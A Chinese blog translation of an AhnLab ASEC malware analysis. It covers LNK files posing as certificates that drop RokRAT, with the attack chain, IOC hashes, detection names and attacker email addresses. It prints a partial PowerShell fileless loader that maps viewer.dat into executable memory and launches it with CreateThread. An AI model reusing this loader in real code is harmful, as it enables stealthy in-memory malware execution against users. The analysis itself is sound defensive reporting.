[译文] 恶意代码分析:2.LNK文件伪装成证书传播RokRAT恶意软件(含无文件攻击)

这是作者新开的一个专栏,主要翻译国外知名安全厂商的技术报告和安全技术,了解它们的前沿技术,学习它们威胁溯源和恶意代码分析的方法,希望对您有所帮助。当然,由于作者英语有限,会借助LLM进行校验和润色,最终结合自己的安全经验完成,还请包涵!

前文介绍了文本编辑器notepad++如何被感染的,通过恶意链接引导用户下载恶意的编辑器,并分析其恶意行为。这篇文章将翻译一篇LNK文件发起的恶意攻击,主要是LNK文件伪装成证书执行RokRAT恶意软件,并利用Powershell命令发起无文件攻击和执行相关行为。基础性技术文章,希望您喜欢!

  • 欢迎关注作者新建的『网络攻防和AI安全之家』知识星球

文章目录

  • 一.前言
  • 二.攻击机理分析
  • 三.恶意软件行为分析及IOCs
  • 四.总结

在这里插入图片描述

  • 原文标题:《LNK File Disguised as Certificate Distributing RokRAT Malware》
  • 原文链接:https://asec.ahnlab.com/en/65076/
  • 文章作者:yeeun [ASEC]
  • 发布时间:2024年5月7日
  • 文章来源:https://asec.ahnlab.com/

前文系列:

  • [译文] LLM安全:1.黑客如何读取您与ChatGPT或微软Copilot的聊天内容
  • [译文] 恶意代码分析:1.您记事本中的内容是什么?受感染的文本编辑器notepad++
  • [译文] 恶意代码分析:2.LNK文件伪装成证书传播RokRAT恶意软件(含无文件攻击)

声明:本人坚决反对利用工具或渗透技术进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地进行防护。该系列主要翻译外文博客为主,旨在为大家提供他们的攻防视角。


一.前言

AhnLab安全情报中心(ASEC,AhnLab SEcurity intelligence Center) 已经确认了持续分发异常大小的快捷方式文件(.LNK),这些文件正在传播具有后门的恶意软件。他们发现该种基于快捷方式文件(.LNK)的恶意软件主要针对韩国用户,特别是与朝鲜相关的用户。

已确认的LNK文件名如下:

  • National Information Academy 8th Integrated Course Certificate (Final).lnk
    国家信息学院第八届综合课程证书(最终).lnk
  • Gate access roster 2024.lnk
    2024年门禁准入名单.lnk
  • Northeast Project (US Congressional Research Service (CRS Report).lnk
    东北项目(美国国会研究服务 CRS报告).lnk
  • Facility list.lnk
    设施列表.lnk

下图展示已确认的LNK文件属性。

在这里插入图片描述


二.攻击机理分析

已确认的LNK文件包含一个通过CMD执行的PowerShell命令,并且它们的类型类似于去年发布的文章中发现的类型。

  • RokRAT Malware Distributed Through LNK Files (*.lnk): RedEyes (ScarCruft)
    通过LNK文件(*.lnk)传播的RokRAT恶意软件:RedEyes (ScarCruft)

这种类型的恶意软件有一个显著特点:它在LNK文件中包含了合法的文档文件、脚本代码和恶意PE数据。

  • legitimate document files
  • script code
  • malicious PE data

下图展示了LNK文件中包含的PDF文件和脚本代码。

在这里插入图片描述

在这里插入图片描述

RokRAT恶意软件的简化操作过程如下所示,是一种比较常见的LNK攻击:

  • 通过Email发起鱼叉式钓鱼攻击,包括恶意LNK文件(可执行Powershell)
  • 整个LNK文件包含:正常PDF文件、viwer.dat、search.dat、find.bat
  • 发起RokRAT无文件攻击,利用云端API收集用户信息

更详细的描述如下:

在这里插入图片描述

(1)当LNK文件被执行时,它会运行PowerShell命令来创建并执行一个合法的文档文件。 如下图所示,创建了一个韩文的合法文档,旨在干扰被攻击者。

在这里插入图片描述

(2)随后,它在%public%文件夹中创建了3个文件。 此步骤中所创建文件的名称和特性如下:

文件名LNK文件中的位置特征
viewer.dat0x2BC97 (size:0xD9402)Encoded RokRAT malware(编码RokRAT恶意软件)
search.dat0x105099 (size:0x5AA)Executes viewer.dat file(执行viewer.dat文件)
find.bat0x105643 (size:0x139)Executes search.dat file(执行search.dat文件)

(3)第一个执行项是“find.bat”,它通过PowerShell代码运行“search.dat”。接着,“search.dat”以无文件攻击的方式读取并执行“viewer.dat”文件。

关键代码如下所示:

$exePath=$env:public+'\'+'viewer.dat';
$exeFile = Get-Content -path $exePath -encoding byte;
[Net.ServicePointManager]::SecurityProtocol = [Enum]::ToObject([Net.SecurityProtocolType], 3072);
$k1123 = [System.Text.Encoding]::UTF8.GetString(34) + 'kernel32.dll' + [System.Text.Encoding]::UTF8.GetString(34);
<중략>
$byteCount = $exeFile.Length;
$buffer = $b::GlobalAlloc(0x0040, $byteCount + 0x100);
$old = 0;
$a90234sb::VirtualProtect($buffer, $byteCount + 0x100, 0x40, [ref]$old);
for($i = 0;$i -lt $byteCount;$i++) { [System.Runtime.InteropServices.Marshal]::WriteByte($buffer, $i, $exeFile[$i]);	};
$handle = $cake3sd23::CreateThread(0, 0, $buffer, 0, 0, 0);
$fried3sd23::WaitForSingleObject($handle, 500 * 1000);

(4)最终执行的“viewer.dat”数据即是RokRAT恶意软件,它是一种后门类型的恶意软件,能够利用云API收集用户信息,并根据威胁攻击者的命令下执行各种恶意行为。

  • 收集到的信息通过如pCloud、Yandex和DropBox等云服务传输到威胁攻击者的云服务器中。此时,请求头中的UserAgent伪装成Googlebot,所使用的云URL如下表所示。
  • User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)

在这里插入图片描述


三.恶意软件行为分析及IOCs

该恶意软件根据威胁行为体(behaviors)或攻击者的命令可以执行的恶意行为包括:

  • 执行cmd命令
  • 收集目录信息
  • 删除启动项文件夹中的特定文件(包括VBS、CMD、BAT和LNK扩展名)
  • 收集启动文件夹列表、%APPDATA%文件夹列表以及最近使用的文件列表
  • 收集PC信息(系统信息、IP、路由器信息等)

此外,还可以执行其他的恶意行为,并且收集到的信息在上传至攻击者的云服务器之前,会先存储在%TEMP%文件夹中。在分析过程中所识别出的攻击者的电子邮件地址如下。

  • tanessha.samuel@gmail[.]com
  • tianling0315@gmail[.]com
  • w.sarah0808@gmail[.]com
  • softpower21cs@gmail[.]com

由于此类事件频繁发生,ASEC将通过其官方博客持续分享有关恶意快捷方式文件传播的信息。特别需要注意,近年来不断发现“针对朝鲜半岛统一、军事和教育相关的个人或团体恶意软件”,因此,我们需要格外谨慎。

[File Detection]

  • Dropper/LNK.S2343 (2024.04.12.03)
  • Trojan/BAT.Runner (2024.04.12.00)
  • Trojan/Script.Generic (2024.04.12.00)
  • Data/BIN.EncPe (2024.04.12.00)
  • Infostealer/Win.Agent.R579429 (2023.05.05.01)

[IoC]

  • b85a6b1eb7418aa5da108bc0df824fc0
  • 358122718ba11b3e8bb56340dbe94f51
  • 35441efd293d9c9fb4788a3f0b4f2e6b
  • 68386fa9933b2dc5711dffcee0748115
  • bd07b927bb765ccfc94fadbc912b0226
  • 6e5e5ec38454ecf94e723897a42450ea
  • 3114a3d092e269128f72cfd34812ddc8
  • bd98fe95107ed54df3c809d7925f2d2c

四.总结

写到这里,这篇文章就介绍完毕,基础性文章,希望对您有所帮助。

在这里插入图片描述

2024年4月28日是Eastmount的安全星球——『网络攻防和AI安全之家』正式创建和运营的日子,该星球目前主营业务为 安全零基础答疑、安全技术分享、AI安全技术分享、AI安全论文交流、威胁情报每日推送、网络攻防技术总结、系统安全技术实战、面试求职、安全考研考博、简历修改及润色、学术交流及答疑、人脉触达、认知提升等。下面是星球的新人券,欢迎新老博友和朋友加入,一起分享更多安全知识,比较良心的星球,非常适合初学者和换安全专业的读者学习。

在这里插入图片描述
目前收到了很多博友、朋友和老师的支持和点赞,尤其是一些看了我文章多年的老粉,购买来感谢,真的很感动,类目。未来,我将分享更多高质量文章,更多安全干货,真心帮助到大家。虽然起步晚,但贵在坚持,像十多年如一日的博客分享那样,脚踏实地,只争朝夕。继续加油,再次感谢!

(By:Eastmount 2024-05-14 星期二 夜于贵阳 http://blog.csdn.net/eastmount/ )

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/327587.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

【Ajax零基础教程】-----第四课 简单实现

一、XMLHttpRequest对象 通过XMLHttpRequest对象来向服务器发送异步请求&#xff0c;从服务器获取数据。然后用JavaScript来操作DOM而更新页面。XMLHttpRequest是ajax的核心机制&#xff0c;它是IE5中首先引入的&#xff0c;是一种支持异步请求的技术。 简单的说&#xff0c;也…

leetcode算法笔记-算法复杂度

对于时间复杂度&#xff0c;主要包括三种情况&#xff1a; 渐进紧确界&#xff1a; O渐进上界&#xff1a; 渐进下界&#xff1a; 加法原则&#xff1a;不同的时间复杂度相加取阶数最高的 乘法原则&#xff1a;不同的时间复杂度相乘&#xff0c;结果为时间复杂度的乘积 阶乘…

古月居讲师/签约作者招募计划

机器人&#xff0c;作为一个集成了多学科技术的复杂系统&#xff0c;其开发过程充满了挑战。为了帮助开发者们更好地克服这些挑战&#xff0c;提升项目的开发效率和质量&#xff0c;古月居特别招募[博客签约作者/课程讲师]。如果您平常热爱记录、分享开发者经验的习惯&#xff…

数据分离和混淆矩阵的学习

1.明确意义 通过训练集建立模型的意义是对新的数据进行准确的预测&#xff08;测试集的准度高才代表good fit&#xff09;&#xff1b; 2.评估流程 3.单单利用准确率accuracy进行模型评估的局限性 模型一&#xff1a;一共1000个数据&#xff08;分别为900个1和100个0&#x…

代码审计平台sonarqube的安装及使用

docker搭建代码审计平台sonarqube 一、代码审计关注的质量指标二、静态分析技术分类三、使用sonarqube的目的四、sonarqube流程五、docker快速搭建sonarqube六、sonarqube scanner的安装和使用七、sonarqube对maven项目进行分析八、sonarqube分析报告解析九、代码扫描规则定制十…

Docker 使用 Fedora 镜像

Fedora 在 Docker 中的使用也非常简单&#xff0c;直接使用命令 docker run -it fedora:latest bash 就可以 pull 到本地的容器中并且运行。 C:\Users\yhu>docker run -it fedora:latest bash Unable to find image fedora:latest locally latest: Pulling from library/fed…

数据库笔记-【视图】

视图 视图通俗是企业想展示给用户看的&#xff0c;数据库存储的数据有很多&#xff0c;但是也有很多是不能对外公开的&#xff0c;做项目的过程就通过视图这个媒介达到这种效果 视图也可以保证数据库表结构字段的隐私安全等 create or replace view stu_v_1 as select id st…

C#反编译太容易了,转qt怎么样?

在开始前我有一些资料&#xff0c;是我根据网友给的问题精心整理了一份「qt的资料从专业入门到高级教程」&#xff0c; 点个关注在评论区回复“888”之后私信回复“888”&#xff0c;全部无偿共享给大家&#xff01;&#xff01;&#xff01;方案1&#xff1a;随机报错 反编都…

LoRA Land: 310个经微调的大语言模型可媲美GPT-4

摘要 低秩自适应 (LoRA) 已成为大语言模型 (LLM) 参数有效微调 (PEFT) 中最广泛采用的方法之一。LoRA 减少了可训练参数的数量和内存使用,同时达到了与全面微调相当的性能。该研究旨在评估在实际应用中训练和服务使用 LoRA 微调的 LLM 的可行性。首先,该研究测量了在 10 个基础…

如何使用恢复模式修复Mac启动问题?这里提供详细步骤

如果你的Mac无法启动,不要惊慌,Mac有一个隐藏的恢复模式,你可以使用它来诊断和修复任何问题,或者在需要时完全重新安装macOS。以下是如何使用它。 如何在Mac上启动到恢复模式 你需要做的第一件事是启动到恢复模式。尽管操作说明会因你使用的Mac电脑而异,但幸运的是,启动…

postman 使用教程

1. get 请求 &#xff1f;号后为 get 请求的参数 参数之间用符号"&" 分隔。 假设url 为&#xff1a;http://10.71.7.101/cgi-bin/gw-config.cgi?methodgetway_param&t1715658871647 复制进来到postman的地址栏 后 &#xff1f;后面的参数会自动添加到参…

kali linux2024.1版安装

1 基于 VMware 安装 Kali 系统 打开已经安装好的 VMware 程序&#xff0c;点击选项卡中的“主页”--》而后点击“创建新的虚拟机” 选择“典型(推荐)”&#xff0c;并点击“下一步” 客户机操作系统镜像选择&#xff1a;选择“稍后安装操作系统”&#xff0c;并点击“下一步”…

C#窗体程序设计笔记:如何调出控件工具箱,并设置控件的属性

文章目录 调出控件工具箱设置控件属性 调出控件工具箱 使用Visual Studio打开C#解决方案后&#xff0c;初始界面如下图所示&#xff1a; 接着&#xff0c;在上方的菜单栏依次选择“视图”“工具箱”&#xff0c;即可打开工具箱&#xff0c;如下图所示&#xff1a; 设置控件属…

STL----push,insert,empalce

push_back和emplace_back的区别 #include <iostream> #include <vector>using namespace std; class testDemo { public:testDemo(int n) :num(n) {cout << "构造函数" << endl;}testDemo(const testDemo& other) :num(other.num) {cou…

第 1 天_二分查找【算法基础】

第 1 天_二分查找 前言34. 在排序数组中查找元素的第一个和最后一个位置题解官方33. 搜索旋转排序数组题解官方74. 搜索二维矩阵 前言 这是陈旧已久的草稿2021-11-09 19:33:44 当时在学习数据结构&#xff0c;然后再LeetCode上找了一个算法基础。 但是后来又没做了。 现在20…

【考古篇】Attension is all you need

Transformer 文章目录 Transformer1. What2. Why3. How3.1 Encoder3.2 Decoder3.3 Attention3.4 Application3.5 Position-wise Feed-Forward Networks(The second sublayer)3.6 Embeddings and Softmax3.7 Positional Encoding3.8 Why Self-Attention 1. What A new simple n…

最新极空间部署iCloudpd教程,实现自动同步iCloud照片到NAS硬盘

【iPhone福利】最新极空间部署iCloudpd教程&#xff0c;实现自动同步iCloud照片到NAS硬盘 哈喽小伙伴们好&#xff0c;我是Stark-C~ 我记得我前年的时候发过一篇群晖使用Docker部署iCloudpd容器来实现自动同步iCloud照片的教程&#xff0c;当时热度还很高&#xff0c;可见大家…

CSS表格特殊样式

列组样式 使用colgroup与col标签配合可以定义列祖样式&#xff1a;例 <!DOCTYPE html> <html><head><meta charset"utf-8"><title></title><style>table,tr,th,td{border: 1px solid #000;}table{border-collapse: coll…

【数据结构】顺序表与链表的差异

顺序表和链表都是线性表&#xff0c;它们有着相似的部分&#xff0c;但是同时也有着很大的差异。 存储空间上的差异&#xff1a; 对于插入上的不同点&#xff0c;顺序表在空间不够时需要扩容&#xff0c;而如果在使用realloc函数去扩容&#xff0c;会有原地扩容和异地扩容两种情…

Python图形复刻——绘制母亲节花束

各位小伙伴&#xff0c;好久不见&#xff0c;今天学习用Python绘制花束。 有一种爱&#xff0c;不求回报&#xff0c;有一种情&#xff0c;无私奉献&#xff0c;这就是母爱。祝天下妈妈节日快乐&#xff0c;幸福永远&#xff01; 图形展示&#xff1a; 代码展示&#xff1a; …